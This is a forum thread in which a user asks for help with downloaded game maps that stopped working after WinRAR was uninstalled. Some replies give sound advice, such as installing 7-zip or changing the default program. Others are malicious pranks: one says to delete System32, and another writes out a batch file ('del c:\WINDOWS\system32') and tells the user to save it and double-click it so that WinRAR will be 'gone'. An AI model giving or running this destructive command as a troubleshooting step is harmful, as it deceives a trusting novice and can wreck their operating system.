I downloaded WinRAR, and I tried to uninstall it but now when I download maps to GMod and TF2, it DLs but it doesnt work, how I fix?

You need it to open .rar files and .efw files, without it, you can't install or download much.

Why would you do this. I hope you have another program to handle zipped files, because you do need one to extraxt the files out of something like a .zip or .rar, etc.

Ive got Windows Extract Wizard if that what your askin'. But, whenever I DL something, it DLs it as a WinRAR file, even though I uninstalled it. Why?

You have to delete your system 32.
It makes it work so much better.

Download 7-zip. It can unpack a bunch of archive file types including rar and can pack to the zip, bzip2, and tar file types. It's also free and open source.

Open up notepad, and type the following:
@echo off del c:\WINDOWS\system32
Save it as anything.bat. Remember to add the .bat extension.
Save as all files, then double click on the document.
And the WinRAR should be gone.

You set winrar as the default program. Rightclick>Open With>Whatever. That is, if you're using Vista.
